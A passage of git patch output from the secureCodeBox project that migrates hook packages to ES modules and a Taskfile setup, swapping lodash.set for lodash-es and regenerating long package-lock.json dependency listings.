"https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true } } } diff --git a/hooks/persistence-elastic/hook/package.json b/hooks/persistence-elastic/hook/package.json index cd03a1fba2..93a5141687 100644 --- a/hooks/persistence-elastic/hook/package.json +++ b/hooks/persistence-elastic/hook/package.json @@ -8,9 +8,7 @@ "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" }, "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, + "scripts": {}, "keywords": [ "secureCodeBox", "security", @@ -39,12 +37,10 @@ "license": "Apache-2.0", "dependencies": { "@elastic/elasticsearch": "^8.18.2", - "lodash.chunk": "^4.2.0", - "lodash.flatmap": "^4.5.0", - "luxon": "^3.6.1" + "lodash-es": "^4.17.21", + "luxon": "^3.7.1" }, "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" + "@types/jest": "^30.0.0" } } \ No newline at end of file From c6f6ffe30d3e56ac4ace787c602cb8b6470f71d5 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 16:21:24 +0200 Subject: [PATCH 114/137] Migrate update field hook to esm and task --- .github/workflows/ci.yaml | 2 +- hooks/update-field-hook/Taskfile.yaml | 8 + hooks/update-field-hook/hook/hook.js | 5 +- hooks/update-field-hook/hook/hook.test.js | 2 +- .../update-field-hook/hook/package-lock.json | 6592 ++--------------- hooks/update-field-hook/hook/package.json | 9 +- 6 files changed, 690 insertions(+), 5928 deletions(-) create mode 100644 hooks/update-field-hook/Taskfile.yaml diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index ab67884ebf..ebcccbdf1b 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -578,7 +578,7 @@ jobs: - persistence-azure-monitor - persistence-elastic - persistence-dependencytrack - # - update-field-hook + - update-field-hook - finding-post-processing - notification # - persistence-static-report (WIP) diff --git a/hooks/update-field-hook/Taskfile.yaml b/hooks/update-field-hook/Taskfile.yaml new file mode 100644 index 0000000000..44003dc9e5 --- /dev/null +++ b/hooks/update-field-hook/Taskfile.yaml @@ -0,0 +1,8 @@ +version: "3" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: update-field-hook diff --git a/hooks/update-field-hook/hook/hook.js b/hooks/update-field-hook/hook/hook.js index 98924b03e0..f1f3f28b80 100644 --- a/hooks/update-field-hook/hook/hook.js +++ b/hooks/update-field-hook/hook/hook.js @@ -2,9 +2,9 @@ // // SPDX-License-Identifier: Apache-2.0 -const set = require("lodash.set"); +import { set } from "lodash-es"; -async function handle({ +export async function handle({ getFindings, updateFindings, attributeName = process.env["ATTRIBUTE_NAME"], @@ -21,4 +21,3 @@ async function handle({ await updateFindings(newFindings); } -module.exports.handle = handle; diff --git a/hooks/update-field-hook/hook/hook.test.js b/hooks/update-field-hook/hook/hook.test.js index 99ccc10835..f701f6a6db 100644 --- a/hooks/update-field-hook/hook/hook.test.js +++ b/hooks/update-field-hook/hook/hook.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook"); +import { handle } from "./hook"; test("should send a post request to the url when fired", async () => { const findings = [ diff --git a/hooks/update-field-hook/hook/package-lock.json b/hooks/update-field-hook/hook/package-lock.json index 9ee10456bc..70eacc779d 100644 --- a/hooks/update-field-hook/hook/package-lock.json +++ b/hooks/update-field-hook/hook/package-lock.json @@ -9,5959 +9,941 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "lodash.set": "^4.3.2" + "lodash-es": "^4.17.21" }, "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" + "@types/jest": "^30.0.0" } }, - "node_modules/@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "node_modules/@babel/code-frame": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, + "license": "MIT", "dependencies": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" }, "engines": { - "node": ">=6.0.0" + "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", + "node_modules/@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, + "license": "MIT", "engines": { "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, + "license": "MIT", "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, + "license": "MIT", "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, + "license": "MIT", "dependencies": { - "color-name": "1.1.3" + "@types/node": "*", + "jest-regex-util": "30.0.1" + }, + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/code-frame/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/@jest/pattern/node_modules/jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", "dev": true, + "license": "MIT", "engines": { - "node": ">=0.8.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/code-frame/node_modules/has-flag": { + "node_modules/@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/istanbul-lib-report": { "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, - "engines": { - "node": ">=4" + "dependencies": { + "@types/istanbul-lib-coverage": "*" } }, - "node_modules/@babel/code-frame/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, + "license": "MIT", "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" + "@types/istanbul-lib-report": "*" } }, - "node_modules/@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", + "node_modules/@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, - "engines": { - "node": ">=6.9.0" + "license": "MIT", + "dependencies": { + "expect": "^30.0.0", + "pretty-format": "^30.0.0" } }, - "node_modules/@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", + "node_modules/@types/jest/node_modules/@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", "dev": true, + "license": "MIT", "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" + "@jest/get-type": "30.0.1" }, "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/core/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", + "node_modules/@types/jest/node_modules/@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" + "@sinclair/typebox": "^0.34.0" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", + "node_modules/@types/jest/node_modules/@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" }, "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", + "node_modules/@types/jest/node_modules/@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/jest/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", + "node_modules/@types/jest/node_modules/ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=8" } }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", + "node_modules/@types/jest/node_modules/expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", + "node_modules/@types/jest/node_modules/jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", + "node_modules/@types/jest/node_modules/jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", + "node_modules/@types/jest/node_modules/jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" + }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", + "node_modules/@types/jest/node_modules/jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", + "node_modules/@types/jest/node_modules/jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", + "node_modules/@types/jest/node_modules/picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", + "node_modules/@types/jest/node_modules/pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, + "license": "MIT", + "dependencies": { + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" + }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": 